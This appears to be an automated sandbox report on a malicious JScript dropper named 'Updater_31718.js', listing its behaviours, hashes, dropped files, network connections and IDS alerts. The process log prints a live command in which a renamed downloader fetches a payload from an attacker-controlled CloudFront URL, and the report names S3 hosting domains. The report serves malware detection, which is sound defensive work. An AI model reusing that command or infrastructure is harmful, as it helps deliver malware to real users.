File name:

Updater_31718.js

Full analysis: https://app.any.run/tasks/ce1fe2a1-137f-4cac-9d7f-8d3faad379eb
Verdict: Malicious activity
Analysis date: September 03, 2025, 17:52:16
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-download
auto-startup
evasion
Indicators:
MIME: application/javascript
File info: JavaScript source, ASCII text, with very long lines (49255)
MD5:

660F6D7B790C2188DD7BD6C0C80E5293

SHA1:

FD9483B5938F8431807BC170938475776457DB55

SHA256:

FE3C13F85B4D4E938BE59B6444FB0346750A31FB5829880B5349174033FC4AA4

SSDEEP:

1536:hD3C6g4FgfKNeu7vC6zUadXL11G1YObBuG:hD3rg4KKeCPzUadXL/G15/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Gets %appdata% folder path (SCRIPT)

      • wscript.exe (PID: 640)
      • wscript.exe (PID: 3972)
    • Accesses environment variables (SCRIPT)

      • wscript.exe (PID: 640)
      • wscript.exe (PID: 3972)
    • Gets a file object corresponding to the file in a specified path (SCRIPT)

      • wscript.exe (PID: 640)
    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 640)
    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 640)
    • Uses base64 encoding (SCRIPT)

      • wscript.exe (PID: 640)
    • Detects the decoding of a binary file from Base64 (SCRIPT)

      • wscript.exe (PID: 640)
    • Starts CMD.EXE for self-deleting

      • cmd.exe (PID: 4044)
      • cmd.exe (PID: 6292)
      • wscript.exe (PID: 3972)
    • Executing a file with an untrusted certificate

      • nasa.exe (PID: 4880)
      • nasa.exe (PID: 304)
      • nasa.exe (PID: 5780)
      • nasa.exe (PID: 5552)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2320)
    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 640)
    • Gets startup folder path (SCRIPT)

      • wscript.exe (PID: 3972)
    • Gets path to any of the special folders (SCRIPT)

      • wscript.exe (PID: 3972)
    • Create files in the Startup directory

      • wscript.exe (PID: 3972)
  • SUSPICIOUS

    • Accesses current user name via WMI (SCRIPT)

      • wscript.exe (PID: 640)
    • Checks whether a specific file exists (SCRIPT)

      • wscript.exe (PID: 640)
    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 640)
      • wscript.exe (PID: 3972)
    • Script creates XML DOM node (SCRIPT)

      • wscript.exe (PID: 640)
    • Saves data to a binary file (SCRIPT)

      • wscript.exe (PID: 640)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 640)
      • wscript.exe (PID: 3972)
    • Uses ATTRIB.EXE to modify file attributes

      • wscript.exe (PID: 640)
      • cmd.exe (PID: 6292)
      • cmd.exe (PID: 4044)
      • cmd.exe (PID: 6812)
    • Executing commands from a ".bat" file

      • wscript.exe (PID: 640)
      • cmd.exe (PID: 4044)
      • powershell.exe (PID: 2320)
      • cmd.exe (PID: 6292)
      • cmd.exe (PID: 6812)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 640)
      • cmd.exe (PID: 6292)
      • cmd.exe (PID: 4044)
      • powershell.exe (PID: 2320)
      • wscript.exe (PID: 3972)
      • cmd.exe (PID: 6812)
    • Executable content was dropped or overwritten

      • wscript.exe (PID: 640)
      • xcopy.exe (PID: 3644)
      • nasa.exe (PID: 304)
      • 7za.exe (PID: 4676)
      • javaw.exe (PID: 2996)
      • javaw.exe (PID: 4560)
    • Adds, changes, or deletes HTTP request header (SCRIPT)

      • wscript.exe (PID: 640)
    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 640)
    • Creates XML DOM element (SCRIPT)

      • wscript.exe (PID: 640)
    • Sets XML DOM element text (SCRIPT)

      • wscript.exe (PID: 640)
    • Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)

      • wscript.exe (PID: 640)
    • Application launched itself

      • cmd.exe (PID: 4044)
      • cmd.exe (PID: 6292)
      • cmd.exe (PID: 6812)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 4544)
      • cmd.exe (PID: 4880)
      • cmd.exe (PID: 6812)
    • Hides command output

      • cmd.exe (PID: 4544)
      • cmd.exe (PID: 4880)
      • cmd.exe (PID: 7596)
    • Process copies executable file

      • cmd.exe (PID: 6292)
    • The executable file from the user directory is run by the CMD process

      • nasa.exe (PID: 4880)
      • nasa.exe (PID: 5780)
      • nasa.exe (PID: 304)
      • 7za.exe (PID: 5992)
      • nasa.exe (PID: 5552)
      • javaw.exe (PID: 4104)
      • javaw.exe (PID: 4560)
      • 7za.exe (PID: 4676)
      • javaw.exe (PID: 2996)
    • Decoding a file from Base64 using CertUtil

      • cmd.exe (PID: 4044)
    • Drops 7-zip archiver for unpacking

      • nasa.exe (PID: 304)
    • Starts process via Powershell

      • powershell.exe (PID: 2320)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6292)
    • Process drops legitimate windows executable

      • 7za.exe (PID: 4676)
    • The process drops C-runtime libraries

      • 7za.exe (PID: 4676)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 640)
      • wscript.exe (PID: 3972)
    • The process executes JS scripts

      • cmd.exe (PID: 6812)
    • Get information on the list of running processes

      • javaw.exe (PID: 2996)
      • javaw.exe (PID: 4560)
    • Connects to unusual port

      • javaw.exe (PID: 4104)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 7596)
    • Identifying current user with WHOAMI command

      • javaw.exe (PID: 2996)
      • javaw.exe (PID: 4560)
    • Starts NET.EXE to display or manage information about active sessions

      • javaw.exe (PID: 4560)
      • net.exe (PID: 7940)
      • javaw.exe (PID: 2996)
      • net.exe (PID: 7228)
    • Checks for external IP

      • javaw.exe (PID: 4560)
      • svchost.exe (PID: 2200)
      • javaw.exe (PID: 2996)
  • INFO

    • Create files in a temporary directory

      • certutil.exe (PID: 3948)
      • javaw.exe (PID: 4560)
      • javaw.exe (PID: 4104)
      • javaw.exe (PID: 2996)
    • Creates files or folders in the user directory

      • xcopy.exe (PID: 3644)
      • nasa.exe (PID: 4880)
      • certutil.exe (PID: 2368)
      • nasa.exe (PID: 304)
      • nasa.exe (PID: 5780)
      • 7za.exe (PID: 5992)
      • nasa.exe (PID: 5552)
      • 7za.exe (PID: 4676)
      • javaw.exe (PID: 2996)
    • Checks supported languages

      • nasa.exe (PID: 4880)
      • nasa.exe (PID: 304)
      • nasa.exe (PID: 5780)
      • 7za.exe (PID: 5992)
      • 7za.exe (PID: 4676)
      • nasa.exe (PID: 5552)
      • javaw.exe (PID: 4104)
      • javaw.exe (PID: 2996)
      • javaw.exe (PID: 4560)
    • Reads the computer name

      • nasa.exe (PID: 4880)
      • nasa.exe (PID: 304)
      • 7za.exe (PID: 5992)
      • nasa.exe (PID: 5780)
      • nasa.exe (PID: 5552)
      • 7za.exe (PID: 4676)
      • javaw.exe (PID: 4560)
      • javaw.exe (PID: 4104)
      • javaw.exe (PID: 2996)
    • Reads the machine GUID from the registry

      • nasa.exe (PID: 304)
      • nasa.exe (PID: 5780)
      • nasa.exe (PID: 4880)
      • nasa.exe (PID: 5552)
      • javaw.exe (PID: 4560)
      • javaw.exe (PID: 2996)
    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 5340)
    • The sample compiled with english language support

      • nasa.exe (PID: 304)
      • 7za.exe (PID: 4676)
    • Reads security settings of Internet Explorer

      • OpenWith.exe (PID: 5340)
    • Application launched itself

      • Acrobat.exe (PID: 5020)
      • AcroCEF.exe (PID: 3948)
    • Creates files in the program directory

      • javaw.exe (PID: 4560)
    • Launching a file from the Startup directory

      • wscript.exe (PID: 3972)
    • Reads the software policy settings

      • slui.exe (PID: 7764)
    • Checks proxy server information

      • slui.exe (PID: 7764)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
294
Monitored processes
158
Malicious processes
10
Suspicious processes
3

Behavior graph

Click at the process to see the details

Process information

PID
CMD
Path
Indicators
Parent process
236timeout /t 1 C:\Windows\System32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
304"C:\Users\admin\AppData\Roaming\nasa.exe" -q --user-agent="casablanca" --header="X-My-Header: shjahsashihi29938299282000320" -O "C:\Users\admin\AppData\Roaming\7za.exe" "https://dy7h8izgcodp3.cloudfront.net/contactus.asp" C:\Users\admin\AppData\Roaming\nasa.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\roaming\nasa.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
424tasklist.exeC:\Windows\SysWOW64\tasklist.exejavaw.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
480tasklist.exeC:\Windows\SysWOW64\tasklist.exejavaw.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
512\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exetasklist.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
640"C:\Windows\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\Updater_31718.jsC:\Windows\System32\wscript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
684"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=gpu-process --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1540 --field-trial-handle=1616,i,2776839931338270552,10849159344902035853,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
700tasklist.exeC:\Windows\SysWOW64\tasklist.exejavaw.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
864tasklist.exeC:\Windows\SysWOW64\tasklist.exejavaw.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
1100attrib -h "C:\Users\admin\1w5wnlju.bat" C:\Windows\System32\attrib.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Attribute Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
Total events
55 410
Read events
55 276
Write events
129
Delete events
5

Modification events

(PID) Process:(640) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
96DB180000000000
(PID) Process:(6292) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
Operation:writeName:Acrobat.Document.DC
Value:
(PID) Process:(5340) OpenWith.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
Operation:writeName:Acrobat.Document.DC
Value:
(PID) Process:(5020) Acrobat.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934
Operation:writeName:DisplayName
Value:
Adobe Acrobat Reader Protected Mode
(PID) Process:(6232) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ExitSection
Operation:writeName:bLastExitNormal
Value:
0
(PID) Process:(6232) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation:writeName:bSynchronizeOPL
Value:
0
(PID) Process:(6232) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:writeName:uLastAppLaunchTimeStamp
Value:
280324936
(PID) Process:(6232) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:writeName:iNumAcrobatLaunches
Value:
7
(PID) Process:(6232) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ToolsSearch
Operation:writeName:iSearchHintIndex
Value:
3
(PID) Process:(6232) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation:writeName:sProductGUID
Value:
4143524F5F5245534944554500
Executable files
166
Suspicious files
217
Text files
121
Unknown types
0

Dropped files

PID
Process
Filename
Type
3644xcopy.exeC:\Users\admin\AppData\Roaming\nasa.exeexecutable
MD5:E314B40A188DE73B6A16A8197F80EE68
SHA256:D6E2656521CA76AD47AD2C503C9F71B3D00820E8B05275D048F7DEA0C9C30BEB
640wscript.exeC:\Users\admin\1w5wnlju.battext
MD5:515888353F816FA5A685D66549B1CCC7
SHA256:5FEFDAA9A402B1EA885625FEBED60447D2491CD21DFDDF71D5FADF4F170F5945
3948certutil.exeC:\Users\admin\AppData\Local\Temp\encoded.txttext
MD5:F0245DA07F6FB3CD55067A94C65DEC7F
SHA256:8DC21E88B2B2352A016045FC5C7F2297346367CE57FB50A098D084E8736B8B26
2368certutil.exeC:\Users\admin\AppData\Roaming\dup8719.battext
MD5:515888353F816FA5A685D66549B1CCC7
SHA256:5FEFDAA9A402B1EA885625FEBED60447D2491CD21DFDDF71D5FADF4F170F5945
4880nasa.exeC:\Users\admin\AppData\Roaming\neft.pdfpdf
MD5:1E6023079CD33A046CDC67AC0843DC06
SHA256:CC02566A3C1266AF489FAF001413BC7DA01C2DC016B5BB4569C5F6B5FF1ED8C8
59927za.exeC:\Users\admin\AppData\Roaming\7z.battext
MD5:9789DC5283DA59112A59392ADE09A9EE
SHA256:37473651760E6E887570321417ED6996EB2576316296F38338F3CCDDFB24AB45
304nasa.exeC:\Users\admin\AppData\Roaming\7za.exeexecutable
MD5:86D2E800B12CE5DA07F9BD2832870577
SHA256:223B873C50380FE9A39F1A22B6ABF8D46DB506E1C08D08312902F6F3CD1F7AC3
2320powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_43uwmzgj.w5j.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6232Acrobat.exeC:\Users\admin\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txttext
MD5:E94526EFE6CC9CB73A2F6DA92E58D169
SHA256:3244F97590D3EBB10D1F4DC50F6D6FF9F193199D00BBB263C0DA001B619032D7
640wscript.exeC:\Users\admin\AppData\Roaming\nasaexecutable
MD5:E314B40A188DE73B6A16A8197F80EE68
SHA256:D6E2656521CA76AD47AD2C503C9F71B3D00820E8B05275D048F7DEA0C9C30BEB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
37
DNS requests
28
Threats
12

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5564
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
US
binary
471 b
whitelisted
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
NL
binary
814 b
whitelisted
2940
svchost.exe
GET
200
104.76.201.34:80
http://x1.c.lencr.org/
DE
binary
734 b
whitelisted
5020
Acrobat.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAfy81yHqHeveu%2FpR5k1Jb0%3D
US
binary
471 b
whitelisted
8008
SIHClient.exe
GET
200
69.192.161.161:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
DE
binary
419 b
whitelisted
8008
SIHClient.exe
GET
200
69.192.161.161:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
DE
binary
407 b
whitelisted
4560
javaw.exe
GET
200
52.49.106.241:80
http://checkip.amazonaws.com/
IE
text
14 b
whitelisted
2996
javaw.exe
GET
200
52.49.106.241:80
http://checkip.amazonaws.com/
IE
text
14 b
whitelisted
1268
svchost.exe
GET
200
23.216.77.42:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
DE
binary
825 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
5944
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1040
RUXIMICS.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
640
wscript.exe
3.5.9.55:443
apocolypser.s3.us-east-1.amazonaws.com
AMAZON-AES
US
shared
4
System
192.168.100.255:138
whitelisted
640
wscript.exe
54.231.138.178:443
publiclfolderfor-essetialcompanymatters.s3.us-east-1.amazonaws.com
AMAZON-02
US
shared
4880
nasa.exe
99.86.1.166:443
dy7h8izgcodp3.cloudfront.net
AMAZON-02
US
whitelisted
304
nasa.exe
99.86.1.166:443
dy7h8izgcodp3.cloudfront.net
AMAZON-02
US
whitelisted
5780
nasa.exe
99.86.1.166:443
dy7h8izgcodp3.cloudfront.net
AMAZON-02
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 51.104.136.2
  • 51.124.78.146
whitelisted
google.com
  • 142.250.181.238
whitelisted
apocolypser.s3.us-east-1.amazonaws.com
  • 3.5.9.55
  • 16.15.185.114
  • 54.231.226.122
  • 16.15.202.54
  • 16.15.184.2
  • 52.216.212.66
  • 52.216.76.240
  • 54.231.228.250
shared
publiclfolderfor-essetialcompanymatters.s3.us-east-1.amazonaws.com
  • 54.231.138.178
  • 54.231.228.178
  • 16.15.201.235
  • 52.216.177.38
  • 16.182.41.250
  • 3.5.9.152
  • 54.231.233.98
  • 52.216.53.130
shared
dy7h8izgcodp3.cloudfront.net
  • 99.86.1.166
  • 99.86.1.175
  • 99.86.1.39
  • 99.86.1.204
whitelisted
login.live.com
  • 20.190.159.130
  • 20.190.159.129
  • 20.190.159.73
  • 40.126.31.69
  • 40.126.31.0
  • 40.126.31.1
  • 20.190.159.131
  • 40.126.31.2
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
olyguard.s3.us-east-1.amazonaws.com
  • 52.217.135.106
  • 16.15.176.255
  • 52.216.245.136
  • 16.15.180.1
  • 52.216.43.194
  • 16.15.188.129
  • 54.231.228.186
  • 3.5.12.26
shared
crl.microsoft.com
  • 23.216.77.42
  • 23.216.77.6
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 69.192.161.161
whitelisted

Threats

PID
Process
Class
Message
2996
javaw.exe
Potentially Bad Traffic
ET INFO Vulnerable Java Version 1.8.x Detected
2200
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (checkip .amazonaws .com)
2996
javaw.exe
Device Retrieving External IP Address Detected
ET INFO External IP Check (checkip .amazonaws .com)
2200
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain (ipapi .co in DNS lookup)
4560
javaw.exe
Potentially Bad Traffic
ET INFO Vulnerable Java Version 1.8.x Detected
4560
javaw.exe
Device Retrieving External IP Address Detected
ET INFO External IP Check (checkip .amazonaws .com)
2200
svchost.exe
Misc activity
SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
2200
svchost.exe
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
2996
javaw.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
4560
javaw.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
No debug info